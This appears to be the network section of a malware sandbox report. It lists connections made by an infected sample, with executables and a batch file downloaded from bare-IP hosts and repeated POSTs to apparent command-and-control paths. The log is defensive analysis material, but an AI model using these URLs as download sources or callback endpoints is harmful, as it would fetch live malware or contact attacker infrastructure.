                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:38 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nrH%2FFqdNrM2%2FWqjho6WzdAxT6ffnTrR2l9Nru21txwES4SeEKQS3YbsU%2FxU7GOOmYLqR323yAfYBhWsQ1b%2F68H5J02dNsKqM3f3jjqLF30bNoHLI5lU826pIg5yRiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255d298116602-AMS
                                                                                            • 193.233.255.73:80
                                                                                              http://193.233.255.73/loghub/master
                                                                                              http
                                                                                              2FX2793.exe
                                                                                              709 B
                                                                                              436 B
                                                                                              5
                                                                                              4

                                                                                              HTTP Request

                                                                                              POST http://193.233.255.73/loghub/master

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 77.91.124.1:80
                                                                                              http://77.91.124.1/theme/index.php
                                                                                              http
                                                                                              explothe.exe
                                                                                              511 B
                                                                                              365 B
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              POST http://77.91.124.1/theme/index.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.247.35:443
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              3.8kB
                                                                                              112.5kB
                                                                                              55
                                                                                              92

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/login

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.247.35:443
                                                                                              https://www.facebook.com/images/cookies/cookie_info_card_image_4.png
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              2.6kB
                                                                                              60.6kB
                                                                                              34
                                                                                              52

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.179.141:443
                                                                                              https://accounts.google.com/generate_204?bWkyBQ
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              8.1kB
                                                                                              133.8kB
                                                                                              79
                                                                                              137

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyw1fqnJmEo7uy6A7MF1VEB6Z999Qk7c8F6z2dBQ2TIdW2ttbCo-59nevQohK8qgnd6uzcaCGg

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/favicon.ico

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              POST https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-5637080031081470389&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=45986&rt=c

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/generate_204?bWkyBQ

                                                                                              HTTP Response

                                                                                              204
                                                                                            • 142.250.179.141:443
                                                                                              https://accounts.google.com/_/bscframe
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.6kB
                                                                                              6.7kB
                                                                                              12
                                                                                              14

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/_/bscframe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 77.91.124.86:19084
                                                                                              AppLaunch.exe
                                                                                              152 B
                                                                                              3
                                                                                            • 157.240.201.15:443
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/bisOS4dl-mS.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              4.2kB
                                                                                              40.3kB
                                                                                              31
                                                                                              41

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/eMLccrbY7PY.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/HNgzzBeIHFV.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/wm4d5zAAo-a.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/nUaWn-aYGoP.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/5tYv3Fgg2PJ.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/bisOS4dl-mS.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.15:443
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              7.5kB
                                                                                              188.7kB
                                                                                              88
                                                                                              151

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/RNFuSb7tdaZ.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3i7M54/ya/l/en_US/kzikDtJjAjw.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/1pSdZY9nD00.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/sFUAis1ZaCC.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.15:443
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/dg2faZxOiZc.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              5.2kB
                                                                                              65.2kB
                                                                                              43
                                                                                              62

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/iaGxcrtiWqg.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/BQn1Lzzcmjv.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/8lNKnIFH3On.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3iF074/yG/l/en_US/bar7zWMDDHc.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/dg2faZxOiZc.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.15:443
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/IM8SUWd81wt.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              4.8kB
                                                                                              98.4kB
                                                                                              51
                                                                                              81

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/l/0,cross/lbK4l0NMzDa.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/mZAoRzDYZAy.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/yjWC116IjAc.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/zI56j6esQGz.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/IM8SUWd81wt.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.15:443
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              4.1kB
                                                                                              35.6kB
                                                                                              29
                                                                                              36

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/hbtFWKHwD29.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/ALrADtg_ASu.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/DiuE6-0r1L8.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.15:443
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yp/l/en_US/M_qt8gV3koE.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              4.7kB
                                                                                              66.7kB
                                                                                              41
                                                                                              60

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/0RhnME2MYqk.css?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/SeW64FDUgJN.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/j-yx5qHhmGi.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/xEUODc7mbZF.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/QJ_ErdZuyUE.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yp/l/en_US/M_qt8gV3koE.js?_nc_x=Ij3Wp8lg5Kz

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.35:443
                                                                                              facebook.com
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              703 B
                                                                                              3.7kB
                                                                                              9
                                                                                              9
                                                                                            • 157.240.201.35:443
                                                                                              https://facebook.com/security/hsts-pixel.gif?c=3.2
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.1kB
                                                                                              4.8kB
                                                                                              10
                                                                                              11

                                                                                              HTTP Request

                                                                                              GET https://facebook.com/security/hsts-pixel.gif?c=3.2

                                                                                              HTTP Response

                                                                                              302
                                                                                            • 157.240.201.35:443
                                                                                              fbcdn.net
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              724 B
                                                                                              4.0kB
                                                                                              9
                                                                                              9
                                                                                            • 157.240.201.35:443
                                                                                              https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.1kB
                                                                                              5.1kB
                                                                                              10
                                                                                              11

                                                                                              HTTP Request

                                                                                              GET https://fbcdn.net/security/hsts-pixel.gif?c=2

                                                                                              HTTP Response

                                                                                              302
                                                                                            • 157.240.201.35:443
                                                                                              https://fbsbx.com/security/hsts-pixel.gif
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.1kB
                                                                                              5.5kB
                                                                                              10
                                                                                              11

                                                                                              HTTP Request

                                                                                              GET https://fbsbx.com/security/hsts-pixel.gif

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.35:443
                                                                                              fbsbx.com
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              724 B
                                                                                              4.0kB
                                                                                              9
                                                                                              9
                                                                                            • 157.240.247.35:443
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.8kB
                                                                                              41.2kB
                                                                                              25
                                                                                              37

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.247.35:443
                                                                                              https://www.facebook.com/images/cookies/cookie_info_card_image_1.png
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.5kB
                                                                                              24.6kB
                                                                                              19
                                                                                              24

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.247.35:443
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.9kB
                                                                                              50.8kB
                                                                                              28
                                                                                              43

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.247.35:443
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.9kB
                                                                                              50.9kB
                                                                                              28
                                                                                              43

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.179.206:443
                                                                                              accounts.youtube.com
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              711 B
                                                                                              7.3kB
                                                                                              9
                                                                                              10
                                                                                            • 142.250.179.206:443
                                                                                              https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=29168969&timestamp=1698151585206
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.8kB
                                                                                              23.7kB
                                                                                              17
                                                                                              25

                                                                                              HTTP Request

                                                                                              GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=29168969&timestamp=1698151585206

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 77.91.68.29:80
                                                                                              http://77.91.68.29/fks/
                                                                                              http
                                                                                              Explorer.EXE
                                                                                              88.2kB
                                                                                              2.3MB
                                                                                              1490
                                                                                              1662

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              POST http://77.91.68.29/fks/

                                                                                              HTTP Response

                                                                                              404
                                                                                            • 193.233.255.73:80
                                                                                              http://193.233.255.73/loghub/master
                                                                                              http
                                                                                              F94E.exe
                                                                                              709 B
                                                                                              436 B
                                                                                              5
                                                                                              4

                                                                                              HTTP Request

                                                                                              POST http://193.233.255.73/loghub/master

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 77.91.68.249:80
                                                                                              http://77.91.68.249/fuza/3.bat
                                                                                              http
                                                                                              Explorer.EXE
                                                                                              435 B
                                                                                              592 B
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://77.91.68.249/fuza/3.bat

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 77.91.124.86:19084
                                                                                              FEEB.exe
                                                                                              152 B
                                                                                              3
                                                                                            • 142.251.36.14:443
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              4.7kB
                                                                                              10.3kB
                                                                                              17
                                                                                              18

                                                                                              HTTP Request

                                                                                              POST https://play.google.com/log?format=json&hasfast=true&authuser=0

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://play.google.com/log?format=json&hasfast=true&authuser=0

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://play.google.com/log?format=json&hasfast=true&authuser=0

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 77.91.124.86:19084
                                                                                              2Ia647Db.exe
                                                                                              152 B
                                                                                              3
                                                                                            • 185.216.70.222:80
                                                                                              http://185.216.70.222/trafico.exe
                                                                                              http
                                                                                              Explorer.EXE
                                                                                              11.2kB
                                                                                              525.0kB
                                                                                              224
                                                                                              380

                                                                                              HTTP Request

                                                                                              GET http://185.216.70.222/trafico.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.35:443
                                                                                              https://www.facebook.com/login
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              1.5kB
                                                                                              36.7kB
                                                                                              20
                                                                                              33

                                                                                              HTTP Request

                                                                                              GET https://www.facebook.com/login

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.35:443
                                                                                              www.facebook.com
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              569 B
                                                                                              3.6kB
                                                                                              6
                                                                                              7
                                                                                            • 142.250.179.141:443
                                                                                              https://accounts.google.com/generate_204?cWpgDQ
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              2.7kB
                                                                                              7.2kB
                                                                                              12
                                                                                              16

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/_/bscframe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/generate_204?cWpgDQ

                                                                                              HTTP Response

                                                                                              204
                                                                                            • 142.250.179.141:443
                                                                                              https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=5573330798703428993&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=46000&rt=c
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              8.2kB
                                                                                              131.3kB
                                                                                              72
                                                                                              127

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxvlDIme0HGaL39d8oyJnRMU-ylnT27SQ6mtAYl6Vq9JJ6v8efWmoVOvtWw-lcgM9Q6Neweww

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET https://accounts.google.com/favicon.ico

                                                                                              HTTP Response

                                                                                              302

                                                                                              HTTP Request

                                                                                              POST https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=5573330798703428993&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=46000&rt=c

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 157.240.201.35:443
                                                                                              facebook.com
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              559 B
                                                                                              3.5kB
                                                                                              6
                                                                                              6
                                                                                            • 157.240.201.35:443
                                                                                              https://facebook.com/security/hsts-pixel.gif?c=3.2
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              964 B
                                                                                              4.6kB
                                                                                              7
                                                                                              9

                                                                                              HTTP Request

                                                                                              GET https://facebook.com/security/hsts-pixel.gif?c=3.2

                                                                                              HTTP Response

                                                                                              302
                                                                                            • 157.240.201.35:443
                                                                                              https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              999 B
                                                                                              5.0kB
                                                                                              7
                                                                                              9

                                                                                              HTTP Request

                                                                                              GET https://fbcdn.net/security/hsts-pixel.gif?c=2

                                                                                              HTTP Response

                                                                                              302
                                                                                            • 157.240.201.35:443
                                                                                              fbcdn.net
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              586 B
                                                                                              3.9kB
                                                                                              6
                                                                                              7
                                                                                            • 157.240.201.35:443
                                                                                              fbsbx.com
                                                                                              tls
                                                                                              IEXPLORE.EXE
                                                                                              580 B
                                                                                              3.7kB
                                                                                              6
                                                                                              6
                                                                                            • 157.240.201.35:443
                                                                                              https://fbsbx.com/security/hsts-pixel.gif
                                                                                              tls, http
                                                                                              IEXPLORE.EXE
                                                                                              993 B
                                                                                              5.4kB
                                                                                              7
                                                                                              9

                                                                                              HTTP Request

                                                                                              GET https://fbsbx.com/security/hsts-pixel.gif

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.42.65.80:80
                                                                                              http://5.42.65.80/newrock.exe
                                                                                              http
                                                                                              Explorer.EXE
                                                                                              385.8kB
                                                                                              21.6MB
                                                                                              8338
                                                                                              16147

                                                                                              HTTP Request

                                                                                              GET http://5.42.65.80/newrock.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 171.22.28.239:42359
                                                                                              9D6.exe
                                                                                              2.1MB
                                                                                              35.2kB
                                                                                              1423
                                                                                              696
                                                                                            • 142.250.179.206:443
